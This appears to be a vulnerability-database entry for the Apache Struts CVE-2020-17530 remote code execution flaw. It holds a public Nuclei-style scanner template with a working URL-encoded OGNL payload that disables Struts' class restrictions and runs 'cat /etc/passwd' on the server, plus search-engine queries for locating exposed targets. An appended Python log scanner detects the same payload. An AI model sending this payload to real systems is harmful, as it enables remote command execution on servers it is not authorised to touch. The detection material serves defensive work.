CVE-2020-17530: Apache Struts 2.0.0-2.5.25 - Remote Code Execution

Date: 2025-08-01 | Affected software: Apache Struts | PoC: Public

Vulnerability Description

Apache Struts 2.0.0 through 2.5.25 is susceptible to remote code execution: forced OGNL evaluation, when applied to raw user input in tag attributes, may allow it.

PoC code [public]

id: CVE-2020-17530

info:
  name: Apache Struts 2.0.0-2.5.25 - Remote Code Execution
  author: pikpikcu
  severity: critical
  description: Apache Struts 2.0.0 through Struts 2.5.25 is susceptible to remote code execution because forced OGNL evaluation, when evaluated on raw user input in tag attributes, may allow it.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected server.
  remediation: |
    Apply the latest security patches or upgrade to a non-vulnerable version of Apache Struts.
  reference:
    - http://packetstormsecurity.com/files/160721/Apache-Struts-2-Forced-Multi-OGNL-Evaluation.html
    - http://jvn.jp/en/jp/JVN43969166/index.html
    - https://cwiki.apache.org/confluence/display/WW/S2-061
    - https://security.netapp.com/advisory/ntap-20210115-0005/
    - https://nvd.nist.gov/vuln/detail/CVE-2020-17530
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-17530
    cwe-id: CWE-917
    epss-score: 0.94362
    epss-percentile: 0.99958
    cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: apache
    product: struts
    shodan-query:
      - http.html:"apache struts"
      - http.title:"struts2 showcase"
      - http.html:"struts problem report"
    fofa-query:
      - body="struts problem report"
      - title="struts2 showcase"
      - body="apache struts"
    google-query: intitle:"struts2 showcase"
  tags: cve,cve2020,apache,rce,struts,kev,packetstorm

http:
  - method: GET
    path:
      - "{{BaseURL}}/?id=%25%7B%28%23instancemanager%3D%23application%5B%22org.apache.tomcat.InstanceManager%22%5D%29.%28%23stack%3D%23attr%5B%22com.opensymphony.xwork2.util.ValueStack.ValueStack%22%5D%29.%28%23bean%3D%23instancemanager.newInstance%28%22org.apache.commons.collections.BeanMap%22%29%29.%28%23bean.setBean%28%23stack%29%29.%28%23context%3D%23bean.get%28%22context%22%29%29.%28%23bean.setBean%28%23context%29%29.%28%23macc%3D%23bean.get%28%22memberAccess%22%29%29.%28%23bean.setBean%28%23macc%29%29.%28%23emptyset%3D%23instancemanager.newInstance%28%22java.util.HashSet%22%29%29.%28%23bean.put%28%22excludedClasses%22%2C%23emptyset%29%29.%28%23bean.put%28%22excludedPackageNames%22%2C%23emptyset%29%29.%28%23arglist%3D%23instancemanager.newInstance%28%22java.util.ArrayList%22%29%29.%28%23arglist.add%28%22cat+%2Fetc%2Fpasswd%22%29%29.%28%23execute%3D%23instancemanager.newInstance%28%22freemarker.template.utility.Execute%22%29%29.%28%23execute.exec%28%23arglist%29%29%7D"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"
# digest: 490a0046304402202350794f77fa6189795e912be9f05e89ef009827cec00b5df7bad7c674cba7f102203e818e8a330b39f069e5ddc6c1115938c5a4ba627d7dc1a8f4815017556dd562:922c64590222798bb761d5b6d8e72950
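
A detection-side counterpart to the request this template sends, as an added example (not part of the original template or of Apache Struts): it URL-decodes the request target of access-log lines and flags OGNL expressions that reference the names used in the payload above. The combined log format, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Names taken from the template's payload: they show a request reaching into
# the OGNL context and its class/package exclusion lists.
OGNL_MARKERS = (
    "org.apache.tomcat.InstanceManager",
    "com.opensymphony.xwork2.util.ValueStack",
    "memberAccess",
    "excludedClasses",
    "excludedPackageNames",
    "freemarker.template.utility.Execute",
)
# Request line of a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|PUT|HEAD) (\S+) HTTP/[\d.]+"')
# OGNL expression wrapper after decoding: %{ ... } or ${ ... }
EXPR_RE = re.compile(r"[%$]\{.*\}", re.S)

def decode_fully(value, max_rounds=3):
    """URL-decode repeatedly (bounded) to see through double encoding."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def inspect_line(line):
    """Return the markers found inside an OGNL expression, or [] if none."""
    match = REQUEST_RE.search(line)
    if not match:
        return []
    target = decode_fully(match.group(1))
    if not EXPR_RE.search(target):
        return []
    return [name for name in OGNL_MARKERS if name in target]

def scan(lines):
    """Return (line_number, markers) for every suspicious log line."""
    hits = ((n, inspect_line(line)) for n, line in enumerate(lines, 1))
    return [(n, markers) for n, markers in hits if markers]

# Constructed sample log lines (addresses from the documentation range).
SAMPLE_LINES = [
    '198.51.100.4 - - [01/Aug/2025:10:00:00 +0000] "GET /index.action?id=42 HTTP/1.1" 200 1024',
    '198.51.100.4 - - [01/Aug/2025:10:00:01 +0000] "GET /cart.action?discount=10%25 HTTP/1.1" 200 900',
    '203.0.113.7 - - [01/Aug/2025:10:00:02 +0000] "GET /?id=%25%7B%28%23macc%3D%23bean.get%28%22memberAccess%22%29%29.%28%23bean.put%28%22excludedClasses%22%2C%23emptyset%29%29%7D HTTP/1.1" 200 512',
]
```

A hit requires both an expression wrapper and at least one marker, so an ordinary `%25` in a parameter value is not flagged.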
